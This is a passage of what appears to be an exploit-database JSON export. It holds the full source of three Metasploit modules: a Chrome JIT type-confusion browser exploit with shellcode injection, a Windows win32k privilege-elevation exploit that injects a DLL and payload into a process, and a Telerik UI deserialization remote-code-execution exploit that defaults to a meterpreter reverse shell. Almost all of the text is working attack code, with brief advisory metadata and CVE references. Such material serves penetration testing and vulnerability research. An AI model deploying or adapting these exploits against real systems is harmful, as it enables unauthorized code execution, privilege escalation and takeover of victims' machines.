shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(div_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, 
fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n}\n\npwn();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n^\n\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_object_create.rb"}, {"lastseen": "2020-12-10T22:35:11", "description": "This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process. This module can target the renderer process (target 0), but Google Chrome must be launched with the --no-sandbox flag for the payload to execute successfully. Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. Additionally the exploit can cause the target machine to restart when the session is terminated. 
A BSOD is also likely to occur when the system is shut down or rebooted.\n", "published": "2020-02-14T22:10:52", "type": "metasploit", "title": "Google Chrome 67, 68 and 69 Object.create exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-12-07T11:02:10", "id": "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n include Msf::Payload::Windows::AddrLoader_x64\n include Msf::Payload::Windows::ReflectiveDllInject_x64\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process.\n This module can target the renderer process (target 0), but Google\n Chrome must be launched with the --no-sandbox flag for the payload to\n execute successfully.\n Alternatively, this module can use CVE-2019-1458 to escape the renderer\n sandbox (target 1). This will only work on vulnerable versions of\n Windows (e.g Windows 7) and the exploit can only be triggered once.\n Additionally the exploit can cause the target machine to restart\n when the session is terminated. 
A BSOD is also likely to occur when\n the system is shut down or rebooted.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx', 'linux'],\n 'DefaultTarget' => 0,\n 'Targets' => [\n [\n 'No sandbox escape (--no-sandbox)', {}\n ],\n [\n 'Windows 7 (x64) sandbox escape via CVE-2019-1458',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'DefaultOptions' => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' }\n }\n ],\n ],\n 'DisclosureDate' => '2018-09-25'\n )\n )\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information during exploitation', false]),\n ])\n deregister_options('DLL')\n end\n\n def library_path\n File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll')\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status('[*] ' + request.body)\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n download_payload = ''\n shellcode = payload.encoded\n uripath = datastore['URIPATH'] || get_resource\n uripath += '/' unless uripath.end_with? 
'/'\n\n if target.name.end_with?('CVE-2019-1458')\n if request.uri.to_s.end_with?('/payload')\n loader_data = stage_payload\n pidx = loader_data.index('PAYLOAD:')\n if pidx\n loader_data[pidx, payload.encoded.length] = payload.encoded\n end\n loader_data += \"\\0\" * (0x20000 - loader_data.length)\n send_response(cli, loader_data, {\n 'Content-Type' => 'application/octet-stream',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n print_good(\"Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)\")\n end\n loader = generate_loader\n shellcode = loader[0]\n shellcode_addr_offset = loader[1]\n shellcode_size_offset = loader[2]\n download_payload = <<-JS\n var req = new XMLHttpRequest();\n req.open('GET', '#{uripath}payload', false);\n req.overrideMimeType('text/plain; charset=x-user-defined');\n req.send(null);\n if (req.status != 200) {\n return;\n }\n let payload_size = req.responseText.length;\n let payload_array = new ArrayBuffer(payload_size);\n let payload8 = new Uint8Array(payload_array);\n for (let i = 0; i < req.responseText.length; i++) {\n payload8[i] = req.responseText.charCodeAt(i) & 0xff;\n }\n let payload_array_mem_addr = memory.addrof(payload_array) + 0x20n;\n let payload_array_addr = memory.readPtr(payload_array_mem_addr);\n print('payload addr: 0x' + payload_array_addr.toString(16));\n uint64View[0] = payload_array_addr;\n for (let i = 0; i < 8; i++) {\n shellcode[#{shellcode_addr_offset} + i] = uint8View[i];\n }\n for (let i = 0; i < 4; i++) {\n shellcode[#{shellcode_size_offset} + i] = (payload_size>>(8*i)) & 0xff;\n }\n for (let i = 4; i < 8; i++) {\n shellcode[#{shellcode_size_offset} + i] = 0;\n }\n JS\n end\n\n jscript = <<~JS\n let ab = new ArrayBuffer(8);\n let floatView = new Float64Array(ab);\n let uint64View = new BigUint64Array(ab);\n let uint8View = new Uint8Array(ab);\n\n let shellcode = new Uint8Array([#{Rex::Text.to_num(shellcode)}]);\n\n Number.prototype.toBigInt = 
function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n };\n\n BigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n };\n\n function hex(n) {\n return '0x' + n.toString(16);\n };\n\n function fail(s) {\n print('FAIL ' + s);\n throw null;\n }\n\n const NUM_PROPERTIES = 32;\n const MAX_ITERATIONS = 100000;\n\n function gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n }\n\n function make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n }\n\n function pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n 
return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n 
#{download_payload}\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(el_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n }\n\n pwn();\n JS\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = <<~JS\n print = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n };\n JS\n\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(%r{//.*$}, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %(\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n)\n send_response(cli, html, {\n 'Content-Type' => 'text/html',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n end\n\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_object_create.rb"}, {"lastseen": 
"2021-01-15T19:11:44", "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitalized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.\n", "published": "2020-10-15T15:59:44", "type": "metasploit", "title": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-12-07T11:02:10", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',\n 'Description' => %q{\n This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. 
By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'piotrflorczyk', # poc\n 'unamer', # exploit\n 'timwr', # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows 7 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS ],\n 'Reliability' => [ UNRELIABLE_SESSION ]\n },\n 'References' =>\n [\n ['CVE', '2019-1458'],\n ['URL', 'https://github.com/unamer/CVE-2019-1458'],\n ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],\n ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],\n ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']\n ],\n 'DisclosureDate' => '2019-12-10',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'WizardOpium' ]\n )\n )\n register_options([\n OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])\n ])\n end\n\n def setup_process\n process_name = datastore['PROCESS']\n begin\n print_status(\"Launching #{process_name} to host the exploit...\")\n launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)\n process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. 
Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe\n end\n\n file_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys')\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n build_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\")\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607\n return 
CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')\n end\n\n process = setup_process\n library_data = exploit_data('CVE-2019-1458', 'exploit.dll')\n print_status(\"Injecting exploit into #{process.pid} ...\")\n exploit_mem, offset = inject_dll_data_into_process(process, library_data)\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2019_1458_wizardopium.rb"}, {"lastseen": "2021-01-15T19:13:38", "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 
'2020.3.915').\n", "published": "2020-10-07T17:40:10", "type": "metasploit", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T17:48:59", "id": "MSF:EXPLOIT/WINDOWS/HTTP/TELERIK_RAU_DESERIALIZATION/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits 
the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the 
upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll'\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? 
&& datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && 
Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 
